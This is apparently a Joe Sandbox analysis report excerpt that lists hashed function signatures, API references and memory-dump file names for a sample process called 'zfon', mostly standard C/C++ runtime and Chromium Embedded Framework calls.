                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                • Instruction ID: 0369f5a37d547324310c4fe1226cbfeee328ad537b4005ad5925154f25ebfc57
                                                                                                • Opcode Fuzzy Hash: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                • Instruction Fuzzy Hash: B2F08122E1864142E780BF11ED413AD6330EB487C0FC44431E65D07AEADF3CE4928360
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9102F3F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9102F82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                • API String ID: 3668304517-2799312399
                                                                                                • Opcode ID: f900907ded2f50d54d52aa96b2e03f19fce0c69ff2b6659e1f2decb36258605d
                                                                                                • Instruction ID: 8785ff834d91bbe8552ccea963760f979822c1399720d0b64f4122f17ef8d3e2
                                                                                                • Opcode Fuzzy Hash: f900907ded2f50d54d52aa96b2e03f19fce0c69ff2b6659e1f2decb36258605d
                                                                                                • Instruction Fuzzy Hash: BAD1EF22B086C289EB52DF6AD1402BD2B61FB45BD4F804571DF4E17BA5DE3EE946E300
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B91033EF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9103432
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                • API String ID: 3668304517-2799312399
                                                                                                • Opcode ID: e632bfa2d873c0be3d312fc90208439f941055322aecca706e8eed900dda154e
                                                                                                • Instruction ID: a57cb1b507c83ce564cdb8535fb503ecf1efbe4dd513956cdffaf1dcdec9a8c9
                                                                                                • Opcode Fuzzy Hash: e632bfa2d873c0be3d312fc90208439f941055322aecca706e8eed900dda154e
                                                                                                • Instruction Fuzzy Hash: 5FD1BB22B0CAC28AEB50DF6A94402BD2761FB45BD4F805171DF4E1B7A9DE3EE546E304
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1004598685-3788999226
                                                                                                • Opcode ID: fd96c43c9ae9a7940df19a78275077a50898266131be15fa7121a827a308b9e3
                                                                                                • Instruction ID: bcb7fb21447734aa8fa0349fa752bd0394f7048a2ba9045c3ccde8450926d5de
                                                                                                • Opcode Fuzzy Hash: fd96c43c9ae9a7940df19a78275077a50898266131be15fa7121a827a308b9e3
                                                                                                • Instruction Fuzzy Hash: 7DB1BE22B18B8585EF24DFA5D9502ECA371FB48BD8F898132DE2D57798DF38E4458390
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B910D5F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID: %.0Lf$0123456789-
                                                                                                • API String ID: 3668304517-3094241602
                                                                                                • Opcode ID: c075ca733a5e2985d7409c734a112bdb889e844c53dbfec16932d9e1d86b165b
                                                                                                • Instruction ID: bd690f246ca3a14500c1bee8dfeabd4716422e83c55f1c73b885387a1502d07c
                                                                                                • Opcode Fuzzy Hash: c075ca733a5e2985d7409c734a112bdb889e844c53dbfec16932d9e1d86b165b
                                                                                                • Instruction Fuzzy Hash: 68815526B08B859AEB10CF69D4402AC23B1FB48B88F408136DF4E67BA8DF3CE555D354
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentImageNonwritableUnwind
                                                                                                • String ID: csm
                                                                                                • API String ID: 451473138-1018135373
                                                                                                • Opcode ID: e4c021b48a88740338c5921ea959046dd8c7dfd39424219a23c6621b5fb580c7
                                                                                                • Instruction ID: 79f28e0f00c28de9eff84a569dc7887bc44b9a5b88b41285033acac8f76b6727
                                                                                                • Opcode Fuzzy Hash: e4c021b48a88740338c5921ea959046dd8c7dfd39424219a23c6621b5fb580c7
                                                                                                • Instruction Fuzzy Hash: E351AE36A196028AEB549BA9E464A39B7A2FB44BD8F148531DF4A47788DF7CF841C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturnswprintf_s
                                                                                                • String ID: %.0Lf
                                                                                                • API String ID: 296878162-1402515088
                                                                                                • Opcode ID: 989814ed0aab853247327d7537572a65def7191e538b3b40b3089a5dc173ab06
                                                                                                • Instruction ID: d3de339d7ea4a6341e3f0925ae61929c85a69c9e7bbce919b1862f2ebb0b7974
                                                                                                • Opcode Fuzzy Hash: 989814ed0aab853247327d7537572a65def7191e538b3b40b3089a5dc173ab06
                                                                                                • Instruction Fuzzy Hash: B2515B62B19F8595EB01DF69E8402AD6370AB89BD4F504232DF5D27BA9EF3CD046D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CreateFrameInfo
                                                                                                • String ID: csm
                                                                                                • API String ID: 2697087660-1018135373
                                                                                                • Opcode ID: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                • Instruction ID: e20a8f4130404b7c95f8e0b0e610f20c3e744ab593ab0e119664c2388309b977
                                                                                                • Opcode Fuzzy Hash: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                • Instruction Fuzzy Hash: 31514833A1975286E660AB6AE45026E77A4FB89BE5F141138EB8D07B55CF3CF461CB00
                                                                                                APIs
                                                                                                • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF7F96E457A,?,?,?,?,?,00007FF7F96E3EB6), ref: 00007FF7F96E4334
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00007FF7F96E457A,?,?,?,?,?,00007FF7F96E3EB6), ref: 00007FF7F96E43B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@memcpy
                                                                                                • String ID: string too long
                                                                                                • API String ID: 237780522-2556327735
                                                                                                • Opcode ID: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                • Instruction ID: ce538dcd645fdaae83ee90136e0f5c8baa17c579643af84e3ac1a2916a782c11
                                                                                                • Opcode Fuzzy Hash: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                • Instruction Fuzzy Hash: EC31A021B18A4281DF15AF26E94403CB272FB88FD4B985131CE3D87BDCDE2DE45183A9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Strftime_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: !%x
                                                                                                • API String ID: 1195835417-1893981228
                                                                                                • Opcode ID: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                • Instruction ID: ab6ce746f4bee450f945f7097fa7b7fd01be170b3dda4ed02e61b8d1b46e8948
                                                                                                • Opcode Fuzzy Hash: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                • Instruction Fuzzy Hash: E6415A62B08AC1AEEB119FB9D4103ED2771AB58798F408622DF9C17B9AEE38D145D350
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@memcpy
                                                                                                • String ID: string too long
                                                                                                • API String ID: 237780522-2556327735
                                                                                                • Opcode ID: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                • Instruction ID: d69d028503bf0fcecc8e7cd7579d88f6e634cdd9b159b8df49a244880f4a2a50
                                                                                                • Opcode Fuzzy Hash: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                • Instruction Fuzzy Hash: FD31BF31B08A4180EF14AF1AE944569A232EB48FD4F884135DE7E07BDDDF2ED491839A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _errnoisspace
                                                                                                • String ID: +
                                                                                                • API String ID: 607103254-2126386893
                                                                                                • Opcode ID: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                • Instruction ID: 1d2fb01f6a6af1e40dd08c71c3fbdd999073e4424c8be8e6b050e201814033df
                                                                                                • Opcode Fuzzy Hash: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                • Instruction Fuzzy Hash: 3321B221F09A9A81FE669F2DE55427CAAD1AB54BD0F594039DF6D83790DE3CD8839300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: void$void
                                                                                                • API String ID: 2943138195-3746155364
                                                                                                • Opcode ID: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                • Instruction ID: 256b16f68ca512b4685168fef67914be78d16ae6eb6250b55c8ff61e60617d1d
                                                                                                • Opcode Fuzzy Hash: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                • Instruction Fuzzy Hash: 8C311562E18A569CFB01CFA8E8600FC77B4BB48788B940136EF4E62B59DF3CA144C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E2B8F
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E2BDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: text/html
                                                                                                • API String ID: 3856544966-3872744991
                                                                                                • Opcode ID: 888e6c1b3f1e3331f613257842be11fd7939f225599eba024fbb2b563b5733c6
                                                                                                • Instruction ID: 0540b33be286a63b7075eeb3063cf3f7f8f0bceba4aeb381890502054f47dec8
                                                                                                • Opcode Fuzzy Hash: 888e6c1b3f1e3331f613257842be11fd7939f225599eba024fbb2b563b5733c6
                                                                                                • Instruction Fuzzy Hash: C2314D62608B4581EB50AF15E880269B732FBC8BE8F949221E6AD43AECCF2CC545C754
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                • API String ID: 3041573648-612978255
                                                                                                • Opcode ID: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                • Instruction ID: f11c4be7be2c00459fa95bc2c95995ba30f0e0744b6d8b20d7e8c34b74b63f5e
                                                                                                • Opcode Fuzzy Hash: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                • Instruction Fuzzy Hash: 97218B62B08B41C1DB44DF2AE880169A7B1FB88FC4B588036DB5E837A8DF28C495C350
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
